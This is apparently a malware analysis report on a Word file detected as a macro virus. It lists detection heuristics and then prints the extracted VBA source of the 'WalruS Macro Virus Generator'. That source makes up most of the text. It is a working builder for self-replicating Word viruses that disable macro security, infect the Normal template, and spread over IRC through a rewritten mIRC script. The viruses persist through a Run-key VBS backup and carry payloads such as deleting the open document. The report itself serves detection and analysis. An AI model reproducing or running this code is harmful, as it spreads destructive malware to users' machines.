MALICIOUS
466
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The file contains legacy WordBasic macro virus markers and VBA macros that utilize WScript.Shell and CreateObject, indicating an intent to execute external code. The presence of AutoOpen and Document_Open macros suggests the malicious code runs automatically upon opening the document. The ClamAV detections further confirm its malicious nature, identifying it as a trojan.
Heuristics 12
-
Raw OLE macro text shows self-replication or security tampering critical OLE_RAW_MACRO_SELF_REPLICATIONOLE streams contain macro source text with auto-run entry points, CreateObject automation, CodeModule AddFromString/InsertLines/DeleteLines behavior, and Outlook or macro-security tampering. This is high-confidence macro-virus behavior even when oletools does not recover a standard VBA project.
-
ClamAV: Doc.Trojan.Fool-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Fool-3
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Print #1, "Options.BlueScreen = True" Print #1, "MyApp = Shell(""notepad.exe"", 1)" Print #1, "SendKeys ""Hello there!~~Im the WalruS. Welcome To My New Creation - Furio~~~///0-0\\\ WalruS 09/00"", True" -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Print #1, "Print #1, ""Dim WSHShell""" Print #1, "Print #1, ""Set WSHShell = WScript.CreateObject(""""WScript.Shell"""")""" Print #1, "Print #1, ""Set Backup = WScript.CreateObject(""""Word.Application"""")""" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Print #1, "Print #1, ""Dim WSHShell""" Print #1, "Print #1, ""Set WSHShell = WScript.CreateObject(""""WScript.Shell"""")""" Print #1, "Print #1, ""Set Backup = WScript.CreateObject(""""Word.Application"""")""" -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Print #1, "" Print #1, "Sub AutoOpen()" Print #1, "'FoolsGold 2000 Virus vWMVG" -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
If OptionButton1.Value = True Then Print #1, "Private Sub Document_Open()" End If -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
' Best Clean The Template Before We Go Sub AutoClose() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.WalruS.8k.com� In document text (OLE body)
- http://www.WalruS.8k.comIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 64144 bytes |
SHA-256: 459566e404b7e460e78b46ecd6a8e8e8a9bcbc90bf0f52f611ecd959b1b1ab32 |
|||
|
Detection
ClamAV:
Win.Trojan.Nihilit-6
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "WMVG"
Attribute VB_Base = "0{C302E890-8A54-4E08-87EC-419BB4C1C9FA}{B1A4CB28-6339-451E-BF22-25CE123D8701}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' ************************************
' WalruS Macro Virus Generator (WMVG)
' Version 1.00
' By The WalruS 10/00
' ************************************
' Help Buttons
Private Sub CommandButton1_Click()
MsgBox "The Virus Will Infect When The Document Is Opened", vbInformation, "WMVG"
End Sub
Private Sub CommandButton10_Click()
MsgBox "The Virus Payload Will Be A Simple Message Box", vbInformation, "WMVG"
End Sub
Private Sub CommandButton11_Click()
MsgBox "The Virus Payload Will Be To Give Word Hiccups :-)", vbInformation, "WMVG"
End Sub
Private Sub CommandButton12_Click()
MsgBox "The Virus Payload Will Be To Open & Close The CD Tray Continously", vbInformation, "WMVG"
End Sub
Private Sub CommandButton13_Click()
MsgBox "The Virus Payload Will Change The Windows" & vbCr & "System Colours Until The PC Is Rebooted", vbInformation, "WMVG"
End Sub
Private Sub CommandButton14_Click()
MsgBox "The Virus Payload Will Delete The Document Being Viewed." & vbCr & Application.UserName & " Is An Evil Bastard ;-)", vbInformation, "WMVG"
End Sub
Private Sub CommandButton15_Click()
MsgBox "The Virus Payload Will Be To Make The Office Assistant Say A Message", vbInformation, "WMVG"
End Sub
Private Sub CommandButton17_Click()
OptionButton15.Value = True
WMVG.Hide
WMVGPayloadAssistant.Show
End Sub
Private Sub CommandButton19_Click()
OptionButton10.Value = True
WMVG.Hide
WMVGPayloadMsg.Show
End Sub
Private Sub CommandButton2_Click()
MsgBox "The Virus Will Infect When The Document Is Closed", vbInformation, "WMVG"
End Sub
Private Sub CommandButton32_Click()
MsgBox "The Virus Will Be Able To Spread On IRC As A Worm", vbInformation, "WMVG"
End Sub
Private Sub CommandButton33_Click()
MsgBox "The Virus Wont Be Able To Spread On IRC!", vbInformation, "WMVG"
End Sub
Private Sub CommandButton48_Click()
MsgBox "The Virus Will Be Backed Up On Reboot" & vbCr & "Therefore Making It Harder To Get Rid Off", vbInformation, "WMVG"
End Sub
Private Sub CommandButton49_Click()
MsgBox "The Virus Wont Have VBS Backup!", vbInformation, "WMVG"
End Sub
Private Sub CommandButton5_Click()
MsgBox "The Virus Wont Have Any Stealth", vbInformation, "WMVG"
End Sub
Private Sub CommandButton6_Click()
MsgBox "The Virus Will Have Limited Stealth" & vbCr & "It Will Disable Alt-F11 Key Presses", vbInformation, "WMVG"
End Sub
Private Sub CommandButton62_Click()
MsgBox "The Payload Runs On A Date Set By You", vbInformation, "WMVG"
End Sub
Private Sub CommandButton63_Click()
MsgBox "The Payload Runs At Random", vbInformation, "WMVG"
End Sub
Private Sub CommandButton65_Click()
MsgBox "The Payload Runs Everytime The Documents Infection Hook Is Run", vbInformation, "WMVG"
End Sub
Private Sub CommandButton72_Click()
OptionButton58.Value = True
WMVG.Hide
WMVGPayloadDate.Show
End Sub
Private Sub CommandButton73_Click()
WMVG.Hide
WMVGExit.Show
End Sub
Private Sub CommandButton74_Click()
WMVG.Hide
WMVGAbout.Show
End Sub
Private Sub CommandButton75_Click()
' Extras
WMVG.Hide
WMVGExtras.Show
End Sub
Private Sub CommandButton76_Click()
' Generate
Call GenerateClassVirus
End Sub
Private Sub CommandButton77_Click()
MsgBox "The Virus Copies Its Code Directly Using String Copy", vbInformation, "WMVG"
End Sub
Private Sub CommandButton78_Click()
MsgBox "The Virus Copies Its Code To A File And Infects From There", vbInformation, "WMVG"
End Sub
Private Sub CommandButton79_Click()
OptionButton59.Value = True
WMVG.Hide
WMVGPayloadRandom.Show
End Sub
Private Sub CommandButton80_Click()
MsgBox "Enter Your Own Payload Code", vbInformation, "WMVG"
End Sub
Private Sub CommandButton81_Click()
OptionButton67.Value = True
WMVG.Hide
WMVGPayloadPlugin.Show
End Sub
Private Sub CommandButton82_Click()
MsgBox "The Virus Will Have Random Noise Added To It" & vbCr & "This Will Make The Virus More Unique And Harder To Detect", vbInformation, "WMVG"
End Sub
Private Sub CommandButton83_Click()
MsgBox "The Source Code Will Be Generated In" & vbCr & "C:\My Documents", vbInformation, "WMVG"
End Sub
Private Sub CommandButton9_Click()
MsgBox "The Virus Wont Have A Payload", vbInformation, "WMVG"
End Sub
Private Sub Frame11_Click()
End Sub
Private Sub Frame16_Click()
End Sub
Private Sub Frame17_Click()
End Sub
Private Sub Frame18_Click()
End Sub
Private Sub Frame3_Click()
End Sub
Private Sub Frame7_Click()
End Sub
Private Sub OptionButton12_Click()
End Sub
Private Sub OptionButton15_Click()
End Sub
Private Sub OptionButton2_Click()
End Sub
Private Sub OptionButton3_Click()
End Sub
Private Sub OptionButton28_Click()
End Sub
Private Sub OptionButton29_Click()
End Sub
Private Sub OptionButton44_Click()
End Sub
Private Sub OptionButton58_Click()
End Sub
Private Sub OptionButton59_Click()
End Sub
Private Sub OptionButton64_Click()
End Sub
Private Sub OptionButton7_Click()
End Sub
Private Sub OptionButton60_Click()
End Sub
Private Sub OptionButton66_Click()
End Sub
Private Sub OptionButton9_Click()
End Sub
Private Sub OptionButton77_Click()
MsgBox "The Virus Will Have Visual Basic Script Backup On Reboot", vbInformation, "WMVG"
End Sub
Private Sub OptionButton78_Click()
MsgBox "The Virus Wont Have VBS Backup", vbInformation, "WMVG"
End Sub
Private Sub TextBox1_Change()
End Sub
Private Sub UserForm_Click()
End Sub
Private Sub GenerateClassVirus()
' Generate The Variables
Call WallysVariableNameGenerator(Variable1, Variable2, Variable3, Variable4, Variable5, Variable6)
' Check Infect On For Error
If OptionButton1.Value = OptionButton2.Value Then
MsgBox "Please Select An Infection Method", vbInformation, "Doh!"
GoTo EndSub
End If
' Check Infection Type For Error
If OptionButton65.Value = OptionButton66.Value Then
MsgBox "Please Select The Infection Method", vbInformation, "One Or The Other"
GoTo EndSub
End If
' Make Sure Stealth Is Not Flagged
If OptionButton5.Value Or OptionButton6.Value = True Then
Stealth = "Good"
End If
' Check Stealth For Error
If Stealth = "Error" Then
MsgBox "Please Select The Stealth Level", vbInformation, "Doh!"
GoTo EndSub
End If
' Check Infect IRC For Error
If OptionButton28.Value = OptionButton29.Value Then
MsgBox "Please State If IRC Spreading Is Required", vbInformation, "Wake Up!"
GoTo EndSub
End If
' Check VBS Backup For Error
If OptionButton44.Value = OptionButton45.Value Then
MsgBox "Please State If VBS Backup Is Required", vbInformation, "You A Script Kiddie?"
GoTo EndSub
End If
' Virus Author
VirusAuthor = TextBox1.Text
' Check Virus Author For Error
If TextBox1 = "" Then
MsgBox "Please Enter Virus Authors Name", vbInformation, "Dont Ya Know Yer Name!"
GoTo EndSub
End If
' Virus Name
VirusName = TextBox2.Text
' Check Virus Name For Error
If TextBox2.Text = "" Then
MsgBox "Please Enter The Virus Name", vbInformation, "Christen It Then!"
GoTo EndSub
End If
' Virus Payload
If OptionButton9.Value = True Then
Payload = False
PayloadTrigger = False
OptionButton58.Value = False
OptionButton59.Value = False
OptionButton60.Value = False
End If
If OptionButton10.Value Or OptionButton11.Value Or OptionButton12.Value Or OptionButton13.Value Or OptionButton14.Value Or OptionButton15.Value Or OptionButton67.Value = True Then Payload = True
' Check Payload For Error
If Payload = Error Then
MsgBox "Please Select Whether A Payload Is Required Or Not", vbInformation, "Get With It"
GoTo EndSub
End If
' Payload Trigger
If OptionButton58.Value Or OptionButton59.Value Or OptionButton60.Value = True Then PayloadTrigger = True
' Check Payload Trigger For Error
If Payload = True And PayloadTrigger = False Then
MsgBox "Please Select A Payload Trigger Or Select No Payload", vbInformation, "Make Yer Mind Up"
GoTo EndSub
End If
' Check To Ensure Month Is Entered If Date Has Been Selected
If OptionButton58.Value = True And PayloadMonth = 0 Then
MsgBox "Please Select A Valid Month Or Select Another Trigger", vbInformation, "Idiot"
GoTo EndSub
End If
' Check To Ensure Day Is Entered If Date Has Been Selected
If OptionButton58.Value = True And PayloadDay = 0 Then
MsgBox "Please Select A Valid Day Or Select Another Trigger", vbInformation, "Idiot"
GoTo EndSub
End If
' Check Random No Has Been Entered If Random Has Been Selected
If OptionButton59.Value = True And RandomTrigger = 0 Then
MsgBox "Please Select A Random Number For The Random Payload", vbInformation, "Random Insult Required"
GoTo EndSub
End If
' Check Message Has Been Entered If Message Payload Has Been Selected
If OptionButton10.Value = True And PayloadMsgText = "" Then
MsgBox "Please Enter A Message Or Select A Different Payload", vbInformation, "Message Required"
GoTo EndSub
End If
' Check Message Type Has Been Entered If Message Payload Has Been Selected
If OptionButton10.Value = True And PayloadMsgType = "Error" Then
MsgBox "Please Enter A Message Type Or Select A Different Payload", vbInformation, "Message Required"
GoTo EndSub
End If
' Check That Payload Plug Has Been Entered
If OptionButton67.Value = True And PayloadPlugin = "Error" Then
MsgBox "Please Enter The Code For The Plugin Payload", vbInformation, "Plugin In Code Required"
GoTo EndSub
End If
' Check That Assistants Message Has Been Entered
If OptionButton15.Value = True And PayloadAssistantMessage = "" Then
MsgBox "Please Enter The Assistants Message Or Select A Different Payload", vbInformation, "Paperclips Words Please"
GoTo EndSub
End If
' Check For Virus Of Same Name
Exists = Dir("C:\My Documents\" & VirusName & ".cls")
If Exists <> "" Then
MsgBox VirusName & " Already Exists" & vbCr & "Please Select Another Name Or Delete" & vbCr & "C:\My Documents\" & VirusName, vbExclamation, "WMVG"
GoTo EndSub
End If
' Open source file for construction
Open "C:\My Documents\" & VirusName & ".cls" For Append As #1
' Marker
Print #1, "'" ' & VirusName *** Possible ***
' CD Tray Payload Declare
If Payload = True And OptionButton11.Value = True Then
Print #1, "Private Declare Function mciSendString Lib ""winmm.dll"" Alias ""mciSendStringA"" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long"
End If
' Colours Payload Declare
If Payload = True And OptionButton13.Value = True Then
Print #1, "Private Declare Function SetSysColors Lib ""user32"" (ByVal nChanges As Long, lpSysColor As Long, lpColorValues As Long) As Long"
End If
' Infection Hook 1 (Open)
If OptionButton1.Value = True Then
Print #1, "Private Sub Document_Open()"
End If
' Infection Hook 2 (Close)
If OptionButton2.Value = True Then
Print #1, "Private Sub Document_Close()"
End If
Call MacroNoiseEngine ' Noise
' Error Handler
Print #1, "On Error Resume Next"
Print #1, ""
' Virus Details
Print #1, "' Virus Name : " & VirusName
Print #1, "' VirusAuthor : " & VirusAuthor
Print #1, "' Comments : " & TextBox3.Text
Print #1, "' Date : " & Day(Now) & "/" & Month(Now) & "/" & Year(Now)
Print #1, ""
Print #1, "' A Virus Created By The WalruS Macro Virus Generator v1.00 (WMVG)"
Print #1, ""
Call MacroNoiseEngine ' Noise
' Word Options
Print #1, "With Options"
Print #1, " .VirusProtection = 0"
Print #1, " .SaveNormalPrompt = 0"
Print #1, " .ConfirmConversions = 0"
Print #1, "End With"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, "Application.DisplayStatusBar = False"
Call MacroNoiseEngine ' Noise
Print #1, "ActiveDocument.ReadOnlyRecommended = False"
Call MacroNoiseEngine ' Noise
Print #1, "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"", ""Level"") = 1&"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, " CommandBars(""Macro"").Controls(""Security..."").Enabled = False"
Call MacroNoiseEngine ' Noise
' Stealth Settings
If OptionButton6.Value = True Then
Print #1, "KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:="" """
End If
Call MacroNoiseEngine ' Noise
Print #1, "Set " & Variable1 & " = NormalTemplate.VBProject.VBComponents(1).codemodule"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, "Set " & Variable2 & " = ActiveDocument.VBProject.VBComponents(1).codemodule"
' Infection Routine No 1 (More To Be Added) Variable1 = nor Variable2 = doc
If OptionButton65.Value = True Then
Print #1, "If " & Variable1 & ".Lines(1, 1) <> ""'"" Then"
Call MacroNoiseEngine ' Noise
Print #1, Variable1 & ".DeleteLines 1, " & Variable1 & ".CountOfLines"
Call MacroNoiseEngine ' Noise
Print #1, Variable1 & ".InsertLines 1, " & Variable2 & ".Lines(1, " & Variable2 & ".CountOfLines)"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, "ElseIf " & Variable2 & ".Lines(1, 1) <> ""'"" Then"
Call MacroNoiseEngine ' Noise
Print #1, Variable2 & ".DeleteLines 1, " & Variable2 & ".CountOfLines"
Call MacroNoiseEngine ' Noise
Print #1, Variable2 & ".InsertLines 1, " & Variable1 & ".Lines(1, " & Variable1 & ".CountOfLines)"
Call MacroNoiseEngine ' Noise
Print #1, "ActiveDocument.Save"
Call MacroNoiseEngine ' Noise
Print #1, "End If"
Call MacroNoiseEngine ' Noise
End If
' Infection Routine No 2 (More To Be Added) Variable1 = nor Variable2 = doc
If OptionButton66.Value = True Then
Print #1, "Open ""C:\Windows\"" & Application.Username & "".sys"" For Output As #1"
Call MacroNoiseEngine ' Noise
Print #1, "Print #1, VBProject.VBComponents(1).codemodule.Lines(1, 150)"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, "Close #1"
Print #1, "If " & Variable1 & ".Lines(1, 1) <> ""'"" Then"
Call MacroNoiseEngine ' Noise
Print #1, Variable1 & ".DeleteLines 1, " & Variable1 & ".CountOfLines"
Call MacroNoiseEngine ' Noise
Print #1, Variable1 & ".AddFromFile (""C:\Windows\"" & Application.Username & "".sys"")"
Print #1, "NormalTemplate.Save"
Print #1, "ElseIf " & Variable2 & ".Lines(1, 1) <> ""'"" Then"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, Variable2 & ".DeleteLines 1, " & Variable2 & ".CountOfLines"
Print #1, Variable2 & ".AddFromFile (""C:\Windows\"" & Application.Username & "".sys"")"
Print #1, "ActiveDocument.Save"
Print #1, "End If"
End If
' WallyS Lamer Detector
Print #1, "Set " & Variable3 & " = " & Variable4
' Infect IRC
If OptionButton28.Value = True Then
Call MacroNoiseEngine ' Noise
Print #1, "If System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\WalruS\WMVG"", ""Installed"") <> ""True"" Then"
Call MacroNoiseEngine ' Noise
Print #1, "exists = Dir(""c:\mirc\mirc32.exe"")"
Print #1, "If exists = """" Then"
Call MacroNoiseEngine ' Noise
Print #1, "Exit Sub"
Print #1, "Else"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, "dropped = Dir(""c:\mirc\download\ReadMe.doc"")"
Print #1, "If dropped = """" Then ActiveDocument.SaveAs ""c:\mirc\download\ReadMe.doc"""
Call MacroNoiseEngine ' Noise
Print #1, "Kill ""c:\mirc\script.ini"""
Print #1, "Open ""c:\mirc\script.ini"" For Output As #1"
Print #1, "Print #1, ""[script]"""
Print #1, "Print #1, ""n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\mirc\download\ReadMe.doc }"""
Print #1, "Print #1, ""n1=on 1:CONNECT: {"""
Print #1, "Print #1, ""n2= /join #virus """
Print #1, "Print #1, ""n3= /msg #virus Im Infected With A Virus Created By WMVG"""
Print #1, "Print #1, ""n4= /part #virus"""
Print #1, "Print #1, ""n5= /clear"""
Print #1, "Print #1, ""n6= /motd"""
Print #1, "Print #1, ""n7= }"""
Print #1, "Close #1"
Print #1, "End If"
Call MacroNoiseEngine ' Noise
Print #1, "End If"
End If
' VBS Backup
If OptionButton44.Value = True Then
Print #1, "If System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\WalruS\WMVG"", ""Installed"") <> ""True"" Then"
Call MacroNoiseEngine ' Noise
Print #1, "Open ""C:\Windows\Backup.drv"" For Output As #1"
Print #1, "Print #1, VBProject.VBComponents(1).CodeModule.Lines(1, 100)"
Print #1, "Close #1"
Print #1, "System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"", ""WMVG"") = ""C:\Windows\Backup.vbs"""
Print #1, "Open ""C:\Windows\Backup.vbs"" For Output As #1"
Print #1, "Print #1, ""' Backup.vbs for WMVG by The WalruS"""
Print #1, "Print #1, ""On Error Resume Next"""
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, "Print #1, ""Dim WSHShell"""
Print #1, "Print #1, ""Set WSHShell = WScript.CreateObject(""""WScript.Shell"""")"""
Print #1, "Print #1, ""Set Backup = WScript.CreateObject(""""Word.Application"""")"""
Print #1, "Print #1, ""Backup.Options.VirusProtection = False"""
Print #1, "Print #1, ""Backup.Options.SaveNormalPrompt = False"""
Call MacroNoiseEngine ' Noise
Print #1, "Print #1, ""For x = 1 To Backup.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines"""
Print #1, "Print #1, ""Backup.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1"""
Print #1, "Print #1, ""Next"""
Print #1, "Print #1, ""Backup.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (""""C:\Windows\Backup.drv"""")"""
Call MacroNoiseEngine ' Noise
Print #1, "Print #1, ""Backup.Application.Quit"""
Print #1, "Close #1"
Print #1, "End If"
End If
' Payload PayloadDay = Every Day
If OptionButton58.Value = True And PayloadDay = 99 Then
Call MacroNoiseEngine ' Noise
Print #1, "If Month(Now) = " & PayloadMonth & " Then Call " & Variable6
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
End If
' Payload PayloadMonth = Every Month
If OptionButton58.Value = True And PayloadMonth = 99 Then
Call MacroNoiseEngine ' Noise
Print #1, "If Day(Now) = " & PayloadDay & " Then Call " & Variable6
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
End If
' Payload Trigger 1 (Date)
If OptionButton58.Value = True And EveryVariable = False Then
Call MacroNoiseEngine ' Noise
Print #1, "If Month(Now) = " & PayloadMonth & " And Day(Now) = " & PayloadDay & " Then Call " & Variable6
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
End If
' Payload Trigger 2 (Random)
If OptionButton59.Value = True Then
Call MacroNoiseEngine ' Noise
Print #1, "Trigger = Int(Rnd * " & RandomTrigger & ")"
Call MacroNoiseEngine ' Noise
Print #1, "If Trigger = 3 Then Call " & Variable6
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
End If
' Payload Trigger 3 (Every Run)
If OptionButton60.Value = True Then
Call MacroNoiseEngine ' Noise
Print #1, "Call " & Variable6
Call MacroNoiseEngine ' Noise
End If
Print #1, "End Sub"
' Payload
If Payload = True Then
Print #1, "Private Sub " & Variable6 & " ()"
Call MacroNoiseEngine ' Noise
Print #1, "On Error Resume Next"
End If
' Payload 1 (Message Box)
If OptionButton10.Value = True Then
Call MacroNoiseEngine ' Noise
Print #1, "MsgBox """ & PayloadMsgText & """" & ", " & PayloadMsgType & ", " & """" & VirusName & """"
End If
' Payload 2 (CD Tray)
If OptionButton11.Value = True Then
Call MacroNoiseEngine ' Noise
Print #1, "Do"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, "mciSendString ""set cd door open"", 0, 0, 0: mciSendString ""set cd door closed"", 0, 0, 0: mciSendString ""set cd time format tmsf wait"", 0, 0, 0: mciSendString ""open cdaudio alias cd wait shareable"", 0, 0, 0"
Call MacroNoiseEngine ' Noise
Print #1, "Loop"
End If
' Payload 3 (Colours)
If OptionButton13.Value = True Then
Call MacroNoiseEngine ' Noise
Print #1, "a = SetSysColors(1, 1, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 2, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 3, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 4, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 5, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 6, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 7, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 8, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 9, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 10, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 11, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 12, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 13, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 14, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 15, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 16, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 17, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 18, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 19, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 20, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 21, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 22, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 23, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 24, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 25, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 26, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 27, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Call MacroNoiseEngine ' Noise
End If
' Payload 4 (Hiccups)
If OptionButton12.Value = True Then
Call MacroNoiseEngine ' Noise
Print #1, "Do"
Print #1, "DoEvents"
Call MacroNoiseEngine ' Noise
Print #1, "Randomize"
Call MacroNoiseEngine ' Noise
Print #1, "If Int(Rnd * 10000) = 2 Then"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, "Word.ActiveDocument.ActiveWindow.WindowState = wdWindowStateMinimize"
Call MacroNoiseEngine ' Noise
Print #1, "Word.ActiveDocument.ActiveWindow.WindowState = wdWindowStateMaximize"
Call MacroNoiseEngine ' Noise
Print #1, "End If"
Print #1, "Loop"
End If
' Payload 5 (KillDoc)
If OptionButton14.Value = True Then
Call MacroNoiseEngine ' Noise
Print #1, "Selection.WholeStory"
Call MacroNoiseEngine ' Noise
Print #1, "Selection.Delete Unit:=wdCharacter, Count:=1"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, "ActiveDocument.Save"
End If
' Payload 6 (Assistant)
If OptionButton15.Value = True Then
Print #1, "Assistant.Visible = True"
Call MacroNoiseEngine ' Noise
Print #1, "With Assistant.NewBalloon"
Print #1, ".Icon = msoIconAlert"
Call MacroNoiseEngine ' Noise
Print #1, ".Text = """ & PayloadAssistantMessage & """"
Print #1, ".Heading = """ & VirusName & """"
Call MacroNoiseEngine ' Noise
Print #1, ".Show"
Print #1, "End With"
End If
' Payload 7 (Plugin)
If OptionButton67.Value = True Then
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, PayloadPlugin
Call MacroNoiseEngine ' Noise
End If
' Payload
If Payload = True Then
Print #1, "End Sub"
End If
Close #1
' Open document and then infect it, save it and close it
Documents.Add Template:=NormalTemplate.FullName, NewTemplate:=False
ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromFile ("C:\My Documents\" & VirusName & ".cls")
ActiveDocument.SaveAs ("C:\My Documents\" & VirusName & ".doc")
ActiveDocument.Close
' Keep the source code?
If CheckBox1.Value = False Then
Kill "C:\My Documents\" & VirusName & ".cls"
End If
' Clean the normal template incase virus infected it
Clean = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If Clean > 0 Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, Clean
NormalTemplate.Save
' Hide this form
WMVG.Hide
' Tell the user that the vxs is made
MsgBox VirusName & " Has Been Created In C:\My Documents", vbInformation, "Heya " & Application.UserName & "..."
' Show Virus Created Form
WMVGVirusCreated.Show
EndSub:
End Sub
' My Variable Name Generator
Private Sub WallysVariableNameGenerator(Variable1, Variable2, Variable3, Variable4, Variable5, Variable6)
Randomize
Variable1 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 9999)
Variable2 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 9999)
Variable3 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 9999)
Variable4 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 9999)
Variable5 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 9999)
